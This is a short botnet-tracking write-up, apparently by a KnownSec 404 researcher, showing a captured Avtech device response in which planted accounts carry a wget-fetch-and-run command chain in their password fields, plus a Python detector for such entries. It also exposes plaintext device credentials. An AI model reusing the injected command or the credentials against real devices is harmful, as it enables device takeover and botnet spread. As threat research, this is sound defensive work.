A case of tracking botnet using ZoomEye

HTTP/1.1 200 OK
Date: Thu, 04 Jul 2019 16:11:40 GMT
Server: Linux/2.x UPnP/1.0 Avtech/1.0
Connection: close
Last-Modified: Wed, 26 Jun 2019 13:07:09 GMT
Content-Type: text/plain
ETag: 37-2410-1561554429
Content-Length: 2410

<Account>
<Maxuser Level="40/40">10</Maxuser>
<LocalPassword Level="40/40">0000</LocalPassword>
<OperatorPassword Level="40/40">0000</OperatorPassword>
<AnonymousLogin Level="40/40" Dispatch="account">DISABLE</AnonymousLogin>
<AdvenceUserLevel Level="40/40">OFF</AdvenceUserLevel>
<User1>
<Username Level="40/40">admin</Username>
<Password Level="40/40">260879jimi</Password>
<Level Level="40/40">SUPERVISOR</Level>
<Lifetime Level="40/40">INFINITE</Lifetime>
<PhoneNum1 Level="40/40" />
<PhoneNum2 Level="40/40" />
<PhoneNum3 Level="40/40" />
<IDCode Level="" />
</User1>
<User2>
<Username Level="40/40" Dispatch="account">eddy</Username>
<Password Level="40/40" Dispatch="account">123456</Password>
<Level Level="40/40" Dispatch="account">POWER USER</Level>
<Lifetime Level="40/40" Dispatch="account">INFINITE</Lifetime>
</User2>
<User3>
<Username Level="40/40" Dispatch="account">user</Username>
<Password Level="40/40" Dispatch="account">123456</Password>
<Level Level="40/40" Dispatch="account">POWER USER</Level>
<Lifetime Level="40/40" Dispatch="account">INFINITE</Lifetime>
</User3>
<User4>
<Username Level="40/40" Dispatch="account">maxposts</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User4>
<User5>
<Username Level="40/40" Dispatch="account">qmcxcfk</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User5>
<User6>
<Username Level="40/40" Dispatch="account">xqmcxcfk</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User6>
</Account>
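
The response above contains account entries (User4 to User6) whose Password field holds a shell command chain and whose Lifetime is 5 MIN. The following is an added example, not code from the original article: a Python check that flags such entries in a collected banner. The sample input is constructed, and the 192.0.2.1 address and the heuristic patterns are assumptions of this example.

```python
import re

# Constructed sample modelled on the response above. 192.0.2.1 is a
# documentation placeholder address, not an indicator from the page.
SAMPLE = """HTTP/1.1 200 OK
Server: Linux/2.x UPnP/1.0 Avtech/1.0

<Account>
<User1>
<Username Level="40/40">admin</Username>
<Password Level="40/40">example-pass</Password>
</User1>
<User2>
<Username Level="40/40" Dispatch="account">qmcxcfk</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://192.0.2.1/sh/AV.sh -O AV.sh;sh AV.sh;</Password>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User2>
</Account>"""

# Regexes rather than an XML parser: device output is untrusted and may not be well-formed.
USER_BLOCK = re.compile(r"<(User\d+)>(.*?)</\1>", re.S)
SHELL_META = re.compile(r"[;|&`]|\$\(")             # command separators / substitution
DOWNLOADER = re.compile(r"\b(?:wget|curl|tftp)\b")  # heuristic list (assumption)
URL = re.compile(r"https?://[^\s;<]+")

def field(block, name):
    """Return the text of <name ...>text</name> inside one user block, or ''."""
    m = re.search(rf"<{name}\b[^>]*>(.*?)</{name}>", block, re.S)
    return m.group(1).strip() if m else ""

def suspicious_accounts(response):
    """Flag account entries whose password field carries shell commands."""
    findings = []
    for slot, block in USER_BLOCK.findall(response):
        password = field(block, "Password")
        reasons = []
        if SHELL_META.search(password):
            reasons.append("shell metacharacters")
        if DOWNLOADER.search(password):
            reasons.append("download command")
        if reasons:
            findings.append({
                "slot": slot,
                "username": field(block, "Username"),
                "lifetime": field(block, "Lifetime"),
                "reasons": reasons,
                "urls": URL.findall(password),
            })
    return findings
```

Run over stored banners, the returned URLs group hosts that were hit by the same campaign.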

The Leader of the KnownSec 404 Team ( ZoomEye http://www.zoomeye.org SeeBug http://www.seebug.org KCon http://kcon.knownsec.com)

heige
